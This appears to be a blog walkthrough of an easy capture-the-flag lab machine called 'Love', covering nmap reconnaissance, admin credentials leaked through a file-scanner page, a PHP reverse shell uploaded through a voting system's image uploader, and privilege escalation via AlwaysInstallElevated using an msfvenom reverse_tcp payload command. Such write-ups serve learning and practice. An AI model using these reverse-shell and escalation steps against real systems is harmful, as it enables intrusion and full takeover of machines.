In this post, i would like to share walkthrough on Love Machine.
This room is been considered difficulty rated as EASY machine
We need to read the following article to fully managed root the machine
- Penetration-Testing-Grimoire/always-install-elevated.md at master · RackunSec/Penetration-Testing-Grimoire · GitHub
- Always Install Elevated – Penetration Testing Lab (pentestlab.blog)
- Voting System 1.0 Shell Upload ≈ Packet Storm (packetstormsecurity.com)
Information Gathering on Love machine
Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
# Nmap 7.91 scan initiated Sat May 1 17:44:08 2021 as: nmap -sC -sV -oA intial -Pn 10.129.102.135
Nmap scan report for 10.129.102.135
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
|_ Host '10.10.16.13' is not allowed to connect to this MariaDB server
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=5/1%Time=608DCBE3%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4A,"
SF:F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4A,"F\0
SF:\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x
SF:20connect\x20to\x20this\x20MariaDB\x20server")%r(RTSPRequest,4A,"F\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,4A,"F
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to
SF:\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Help,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,4A,"F\0\0
SF:\x01\xffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,4A,"F\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connec
SF:t\x20to\x20this\x20MariaDB\x20server")%r(SMBProgNeg,4A,"F\0\0\x01\xffj\
SF:x04Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x2
SF:0to\x20this\x20MariaDB\x20server")%r(X11Probe,4A,"F\0\0\x01\xffj\x04Hos
SF:t\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x2
SF:0this\x20MariaDB\x20server")%r(FourOhFourRequest,4A,"F\0\0\x01\xffj\x04
SF:Host\x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(LPDString,4A,"F\0\0\x01\xffj\x04Host\
SF:x20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t
SF:his\x20MariaDB\x20server")%r(LDAPSearchReq,4A,"F\0\0\x01\xffj\x04Host\x
SF:20'10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(LDAPBindReq,4A,"F\0\0\x01\xffj\x04Host\x20'
SF:10\.10\.16\.13'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\
SF:x20MariaDB\x20server");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 21m20s, deviation: 0s, median: 21m20s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-01T22:07:08
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Let’s see the website interface
The website have show only the Voter’s ID and Password which we doesn’t have at the moment
Let’s us check on other port that mention on nmap result. The website show a forbidden page.
Gaining Access on Love machine
Oh wait! There’s a subdomain that been mention on the nmap result which is staging.love.htb
The website have been redirected to a Free File Scanner interface which also require login credentials.
Let’s click on the demo link at the top of website.
Let’s scan the url http://10.10.10.239:5000 and we gain a admin credentials such as
username: admin
password: @LoveIsInTheAir!!!!
We need to use those credentials on http://love.htb/admin
We managed to logged into the VotingSystem Dashboard
Let’s do some research on the VotingSystem
I found a few epxloit that we can use on the system itself such as shown the screenshot above
However, the exploit didn’t work well for me so i decided to find another way to get a reverse shell on my machine
After a while, i found another php reverse shell at the website here
We need to download it and modify a little bit on the php code so that the reverse shell connection coming back to us.The modificaiton need to be done at sh=new Sh(‘127.0.0.1’,9000); with your VPN IP and port
There is two location that we use to upload our shell code.
*We need to start our nc listening first
The first location is that we need to create position that we will use on this method. Once that completed, we need to create a new candidate with upload shell at the picture uploader.
For the reverse shell to came back, we need to execute the shell at the url love.htb/images and click the filename that we save as shell
Another location is that location on the admin’s profile where we can upload the shell on the replace picture
Maintaing Access
You will get the shell back if you upload the shell in either places.
We can read the user flag on b going to C:\Users\Phoebe\Desktop and use the command “type user.txt“
Escalate to Root Privileges Access
We can run the winpeas.exe on the victim’s machine by transferring the file from our attacker’s machine. After a while, we found out that there’s a feature “AlwaysInstalledElevated” which is normally used to install the MSI package
Let’s do some research on the “AlwaysInstalledElevated” exploit.
We found some exploits that use Metasploit Framework. So, let’s start using Metasploit.
Firstly, we need to create a crafted exploit by using msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe > darknite.exe command
We need to transfer it into our victim’s machine
I can execute the exploit by type the filename just like show above
We can configure our Metasploit exploit by running 2 sessions of multi/handler with divide by background
We can read the root flag by accessing C:\Users\Adminitrator\Desktop and use the “type root.txt” command
-THE END-
Happy Learning Guys!
No responses yet